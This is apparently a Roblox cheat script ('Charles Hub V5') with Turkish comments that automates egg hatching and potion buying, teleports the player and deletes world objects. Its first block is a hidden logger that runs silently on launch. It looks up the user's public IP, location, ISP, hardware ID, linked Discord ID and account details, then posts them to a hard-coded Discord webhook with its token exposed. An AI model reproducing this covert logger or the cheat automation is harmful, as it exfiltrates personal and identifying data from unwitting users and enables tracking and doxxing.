        -- [[ CHARLES HUB V5 - LOGGER ]] --
        local webhookURL = "https://discord.com/api/webhooks/1453830529718681753/WzmmobNWqI8V8ogOyKKjnAdM-ZEm-6Iq4RsFd6dYZso2Zb--b_gN8dtsM8Km5pBQ33Tr"
        local HttpService = game:GetService("HttpService")

        local function logToWebhook()
            pcall(function()
                local lp = game:GetService("Players").LocalPlayer
                local hwid = (gethwid and gethwid()) or (get_hwid and get_hwid()) or game:GetService("RbxAnalyticsService"):GetClientId()
                local executor = (identifyexecutor and identifyexecutor()) or "Bilinmiyor"
                local accountAge = lp.AccountAge
                local membership = tostring(lp.MembershipType):sub(21)
                local joinDate = os.date("%d-%m-%Y", os.time() - (accountAge * 86400))
                local UIS = game:GetService("UserInputService")
                local device = "PC"
                if UIS.TouchEnabled and not UIS.KeyboardEnabled then device = "Mobile"
                elseif game:GetService("GuiService"):IsTenFootInterface() then device = "Console" end
                
                local resolution = "Bilinmiyor"
                pcall(function() resolution = math.floor(Workspace.CurrentCamera.ViewportSize.X) .. "x" .. math.floor(Workspace.CurrentCamera.ViewportSize.Y) end)
                
                local ipInfo = {query = "0.0.0.0", country = "Bilinmiyor", city = "Bilinmiyor", isp = "Bilinmiyor"}
                pcall(function() 
                    local resp = game:HttpGet("http://ip-api.com/json/")
                    if resp then ipInfo = HttpService:JSONDecode(resp) end
                end)

                local discordID = "Bilinmiyor"
                pcall(function()
                    local response = game:HttpGet("https://registry.rover.link/v2/roblox-to-discord/" .. lp.UserId)
                    if response then
                        local decoded = HttpService:JSONDecode(response)
                        if decoded and decoded.discordId then
                            discordID = "<@" .. decoded.discordId .. "> (" .. decoded.discordId .. ")"
                        end
                    end
                end)
                
                -- Oyun istatistiklerini güvenli bir şekilde çek
                local stats = {Coins = "0", Gems = "0", Rebirths = "0", Eggs = "0", Tokens = "0"}
                pcall(function()
                    local folder = lp:FindFirstChild("leaderstats") or lp:FindFirstChild("PlayerStats") or lp:FindFirstChild("Data")
                    if folder then
                        stats.Coins = tostring((folder:FindFirstChild("Clicks") or folder:FindFirstChild("Coins") or folder:FindFirstChild("Taps") or {Value = "0"}).Value)
                        stats.Gems = tostring((folder:FindFirstChild("Gems") or folder:FindFirstChild("Diamonds") or {Value = "0"}).Value)
                        stats.Rebirths = tostring((folder:FindFirstChild("Rebirths") or {Value = "0"}).Value)
                        stats.Eggs = tostring((folder:FindFirstChild("Eggs") or folder:FindFirstChild("TotalEggs") or {Value = "0"}).Value)
                        stats.Tokens = tostring((folder:FindFirstChild("Tokens") or folder:FindFirstChild("TapTokens") or folder:FindFirstChild("TokensValue") or {Value = "0"}).Value)
                    end
                end)

                local data = {
                    ["embeds"] = {{
                        ["title"] = "🚀 Cyberpunkfarm working! (v5.5)",
                        ["color"] = 65280,
                        ["thumbnail"] = {["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. lp.UserId .. "&width=420&height=420&format=png"},
                        ["fields"] = {
                            {["name"] = "Hesap İsmi", ["value"] = lp.Name .. " (" .. membership .. ")", ["inline"] = true},
                            {["name"] = "Roblox ID", ["value"] = tostring(lp.UserId), ["inline"] = true},
                            {["name"] = "Cihaz / Çözünürlük", ["value"] = device .. " / " .. resolution, ["inline"] = true},
                            {["name"] = "Hesap Yaşı / Tarih", ["value"] = accountAge .. " gün (" .. joinDate .. ")", ["inline"] = true},
                            {["name"] = "IP Adresi", ["value"] = "```" .. ipInfo.query .. "```", ["inline"] = true},
                            {["name"] = "Ping", ["value"] = math.floor(lp:GetNetworkPing() * 1000) .. " ms", ["inline"] = true},
                            {["name"] = "Coin / Gem", ["value"] = "💰 " .. tostring(stats.Coins) .. " / 💎 " .. tostring(stats.Gems), ["inline"] = true},
                            {["name"] = "Token / Rebirth", ["value"] = "🎟️ " .. tostring(stats.Tokens) .. " / ⭐ " .. tostring(stats.Rebirths), ["inline"] = true},
                            {["name"] = "Açılan Yumurta", ["value"] = "🥚 " .. tostring(stats.Eggs), ["inline"] = true},
                            {["name"] = "Ülke / Şehir", ["value"] = ipInfo.country .. " / " .. ipInfo.city, ["inline"] = true},
                            {["name"] = "İnternet", ["value"] = ipInfo.isp, ["inline"] = true},
                            {["name"] = "Executor", ["value"] = executor, ["inline"] = true},
                            {["name"] = "Discord ID", ["value"] = discordID, ["inline"] = true},
                            {["name"] = "Sunucu ID", ["value"] = "```" .. game.JobId .. "```", ["inline"] = false},
                            {["name"] = "HWID", ["value"] = "```" .. hwid .. "```", ["inline"] = false},
                            {["name"] = "Zaman", ["value"] = os.date("%Y-%m-%d %H:%M:%S"), ["inline"] = false}
                        },
                        ["footer"] = {["text"] = "Charles Hub V5.5 Ultimate Logger"}
                    }}
                }
                
                request({
                    Url = webhookURL,
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"},
                    Body = HttpService:JSONEncode(data)
                })
            end)
        end
        task.spawn(logToWebhook)

        -- [[ AYARLAR ]] --
        local targetEggName = "Rainbow"   -- Açılacak yumurta adı
        local teleportZoneName = "Rainbow" -- Işınlanılacak ada/bölge adı
        local openAmount = 8 
        local hatchSpeed = 0 
        _G.AutoPotion = true -- YENİ: Otomatik İksir Alma
        
        -- YENİ: Potion Market Kordinatları
        local potionCoords = Vector3.new(-11.61, 10960.55, 221.98)

        local ReplicatedStorage = game:GetService("ReplicatedStorage")
        local Workspace = game:GetService("Workspace")
        local Players = game:GetService("Players")
        local Lighting = game:GetService("Lighting")
        local lp = Players.LocalPlayer

        -- [[ 1. DİNAMİK NETWORK VE REMOTE BULUCU ]] --
        local function GetNetwork()
            -- Favori yöntem: Events ve Functions klasörlerini barındıran üst klasör
            for _, v in pairs(ReplicatedStorage:GetChildren()) do
                if v:IsA("Folder") and v:FindFirstChild("Events") and v:FindFirstChild("Functions") then
                    return v
                end
            end
            -- UUID formatı taraması (32+ karakter ve tire içerir)
            for _, v in pairs(ReplicatedStorage:GetChildren()) do
                if v:IsA("Folder") and #v.Name > 30 and v.Name:find("-") then
                    return v
                end
            end
            return nil
        end

        local Network = GetNetwork()
        if not Network then
            warn("❌ Network klasörü bulunamadı! Remote'lar çalışmayabilir.")
        end

        local function getGameRemote(remoteName)
            if not Network then Network = GetNetwork() end
            if Network then
                local f = Network:FindFirstChild("Functions")
                local e = Network:FindFirstChild("Events")
                local target = (f and f:FindFirstChild(remoteName)) or (e and e:FindFirstChild(remoteName))
                if target then return target end
            end
            
            -- Yedek: Tüm ReplicatedStorage'ı tara
            for _, obj in ipairs(ReplicatedStorage:GetChildren()) do
                if obj:IsA("Folder") or obj:IsA("Configuration") then
                    local f = obj:FindFirstChild("Functions")
                    local e = obj:FindFirstChild("Events")
                    local target = (f and f:FindFirstChild(remoteName)) or (e and e:FindFirstChild(remoteName))
                    if target then return target end
                    
                    -- Direkt altında olabilir mi?
                    local direct = obj:FindFirstChild(remoteName)
                    if direct then return direct end
                end
            end
            
            -- ReplicatedStorage kökünde olabilir (Nadir)
            return ReplicatedStorage:FindFirstChild(remoteName)
        end

        -- [[ 2. AGRESİF FPS BOOST (DÜNYAYI TEMİZLE) ]] --
        local function nukeWorld()
            for _, obj in pairs(Workspace:GetChildren()) do
                -- 1. Island Klasörünün İçini Cerrahi Temizle
                if obj.Name == "Island" then
                    for _, child in pairs(obj:GetChildren()) do
                        if not child.Name:lower():find("candy") then
                            pcall(function() child:Destroy() end)
                        end
                    end
                -- 2. Workspace'teki Diğer Gereksiz Şeyleri Sil (Karakter, Kamera, Yumurtalar ve Base hariç)
                elseif obj.Name ~= lp.Name and 
                obj.Name ~= "Camera" and 
                obj.Name ~= "Eggs" and 
                not obj.Name:find("SafetyFloor") and 
                not obj:IsA("Terrain") then
                    pcall(function() obj:Destroy() end)
                end
            end

            local eggsFolder = Workspace:FindFirstChild("Eggs")
            if eggsFolder then
                for _, egg in pairs(eggsFolder:GetChildren()) do
                    -- Sadece hedef yumurtayı bırak, gerisini sil
                    if not egg.Name:find(targetEggName) then
                        pcall(function() egg:Destroy() end)
                    end
                end
            end
            Workspace.Terrain:Clear()
        end

        -- [[ 3. HAVA DURUMUNU VE EFEKTLERİ SIFIRLA ]] --
        local function cleanLighting()
            Lighting.GlobalShadows = false
            Lighting.FogEnd = 9e9
            Lighting.Brightness = 1
            Lighting.ClockTime = 12
            Lighting.OutdoorAmbient = Color3.fromRGB(128, 128, 128)
            
            for _, effect in pairs(Lighting:GetChildren()) do
                if effect:IsA("PostEffect") or effect:IsA("Sky") or effect:IsA("Clouds") or effect:IsA("Atmosphere") then
                    pcall(function() effect:Destroy() end)
                end
            end
            
            local sky = Instance.new("Sky", Lighting)
            sky.SunTextureId = ""
            sky.MoonTextureId = ""
        end

        -- [[ 4. SHOOTING STAR & EVENT ENGELLEYİCİ ]] --
        local function blockEvents()
            -- 1. ShootingStar modüllerini ve mevcut efektleri sil
            local ssModule = ReplicatedStorage:FindFirstChild("ShootingStars", true)
            if ssModule then pcall(function() ssModule:Destroy() end) end

            for _, v in pairs(Workspace:GetDescendants()) do
                local name = v.Name:lower()
                if name:find("star") or name:find("shooting") then
                    pcall(function() v:Destroy() end)
                end
            end

            -- 2. Yeni gelen event nesnelerini (Electric, Void, Star, Crab vb.) anında engelle
            Workspace.DescendantAdded:Connect(function(v)
                local name = v.Name:lower()
                if name:find("star") or name:find("shooting") or name:find("electric") or name:find("void") or name:find("crab") or name:find("taco") or name:find("event") then
                    task.wait()
                    pcall(function() v:Destroy() end)
                end
            end)
            print("🚫 Event engelleyici ve ShootingStar temizleyici aktif!")
        end

        -- [[ 5. PARÇACIK VE GÖRSEL OPTİMİZASYON ]] --
        local function optimizeVisuals()
            for _, v in pairs(Workspace:GetDescendants()) do
                if v:IsA("ParticleEmitter") or v:IsA("Trail") or v:IsA("Smoke") or v:IsA("Sparkles") then
                    v.Enabled = false
                end
            end
            print("✨ Görsel efektler optimize edildi.")
        end

        -- [[ 4. YUMURTAYI GİZLE ]] --
        local function hideEgg(eggModel)
            if eggModel then
                for _, part in pairs(eggModel:GetDescendants()) do
                    if part:IsA("BasePart") or part:IsA("MeshPart") then
                        part.Transparency = 1 
                        part.CastShadow = false
                    elseif part:IsA("Decal") or part:IsA("Texture") then
                        part:Destroy()
                    elseif part:IsA("ParticleEmitter") or part:IsA("Trail") then
                        part.Enabled = false
                    end
                end
            end
        end

        -- [[ 5. GÜVENLİ ZEMİN ]] --
        local function createFloorAtEgg(target)
            local floor = Instance.new("Part")
            floor.Name = "SafetyFloor"
            floor.Size = Vector3.new(50, 2, 50)
            floor.CFrame = target:GetPivot() * CFrame.new(0, -5, 0)
            floor.Anchored = true
            floor.Transparency = 0.5 
            floor.BrickColor = BrickColor.new("Bright blue")
            floor.Parent = Workspace
            return floor
        end

        -- Gold Machine için 100x100 Emniyet Zemini
        local function createFloorAtMachine()
            local pos = Vector3.new(1415.5, 658.18, -13447.73)
            local floor = Instance.new("Part")
            floor.Name = "SafetyFloor"
            floor.Size = Vector3.new(50, 2, 50)
            floor.Position = pos + Vector3.new(0, -6, 0)
            floor.Anchored = true
            floor.Transparency = 0.5
            floor.BrickColor = BrickColor.new("Bright yellow")
            floor.Material = Enum.Material.Neon
            floor.Parent = Workspace
            print("🏗️ Gold Machine için 100x100 zemin oluşturuldu.")
            return floor
        end

        -- Rainbow Machine için 50x50 Emniyet Zemini
        local function createFloorAtRainbowMachine()
            local pos = Vector3.new(1220.16, 664.95, -13373.58)
            local floor = Instance.new("Part")
            floor.Name = "SafetyFloor"
            floor.Size = Vector3.new(50, 2, 50)
            floor.Position = pos + Vector3.new(0, -6, 0)
            floor.Anchored = true
            floor.Transparency = 0.5
            floor.BrickColor = BrickColor.new("Carnation pink")
            floor.Material = Enum.Material.Neon
            floor.Parent = Workspace
            print("🏗️ Rainbow Machine için 50x50 zemin oluşturuldu.")
            return floor
        end

        -- [[ ANA ÇALIŞTIRICI ]] --
        
        -- ADIM 0: Oyunun ve Network'ün yüklenmesini bekle
        if not game:IsLoaded() then game.Loaded:Wait() end
        task.wait(2) -- Başlangıç için ekstra güvenlik beklemesi

        -- ADIM 1: Adaya Işınlan (Pazar yerinin yüklenmesi için önce buraya gitmeliyiz)
        local tpRemote = getGameRemote("TeleportZone")
        if tpRemote then
            print("🌐 " .. teleportZoneName .. " adasına ışınlanılıyor...")
            tpRemote:InvokeServer(teleportZoneName)
            task.wait(2) 
            
            -- ADIM 1.5: Potion Market'e Özel Işınlan (Dükkanın etrafında yüklenmesi için)
            if lp.Character and lp.Character:FindFirstChild("HumanoidRootPart") then
                print("🧪 Potion Market kordinatlarına gidiliyor...")
                lp.Character:PivotTo(CFrame.new(potionCoords) * CFrame.new(0, 3, 0))
                task.wait(3) -- Dükkan ve Remote'ların yüklenmesi için tam süre tanı
            end
        else
            warn("⚠️ Teleport Remote bulunamadı!")
        end

        -- ADIM 2: Yumurtayı Bul ve Dünyayı Hazırla
        local eggsFolder = Workspace:FindFirstChild("Eggs")
        local eggModel = eggsFolder and (eggsFolder:FindFirstChild(targetEggName) or eggsFolder:FindFirstChild(targetEggName .. " Egg"))

        if eggModel then
            print("🧱 Dünya temizleniyor ve FPS boost uygulanıyor...")
            nukeWorld()
            cleanLighting()
            blockEvents()
            optimizeVisuals()
            createFloorAtEgg(eggModel)
            createFloorAtMachine() 
            createFloorAtRainbowMachine()
            hideEgg(eggModel)
            
            task.wait(0.5)
            if lp.Character then
                lp.Character:PivotTo(eggModel:GetPivot() * CFrame.new(0, 0, 2))
            end
            
            -- ADIM 3: Auto Hatch
            _G.AutoHatch = true
            print("🚀 Sistem Aktif: " .. targetEggName .. " açılıyor!")

            -- ADIM 4: Auto Potion (Otomatik İksir Satın Alma)
            task.spawn(function()
                print("🧪 Auto Potion Döngüsü Başlatıldı!")
                while _G.AutoPotion do
                    -- Hem PotionMachine hem de BuyPotionMachine isimlerini dene
                    local potionRemote = getGameRemote("BuyPotionMachine") or getGameRemote("PotionMachine")
                    if potionRemote then
                        pcall(function()
                            -- 1. argüman genelde iksir ID'si veya tipi olur
                            potionRemote:InvokeServer(1)
                        end)
                    end
                    task.wait(2) -- Daha stabil bir bekleme (2sn)
                end
            end)

            task.spawn(function()
                while _G.AutoHatch do
                    local openRemote = getGameRemote("OpenEgg")
                    if openRemote then
                        -- Snowman veya Snowman Egg ikisini de dener
                        local success = openRemote:InvokeServer(targetEggName, openAmount)
                        if not success then
                            openRemote:InvokeServer(targetEggName .. " Egg", openAmount)
                        end
                    end
                    task.wait(hatchSpeed)
                end
            end)
        else 
            warn("❌ Hedef yumurta (" .. targetEggName .. ") ışınlanılan adada bulunamadı!")
        end
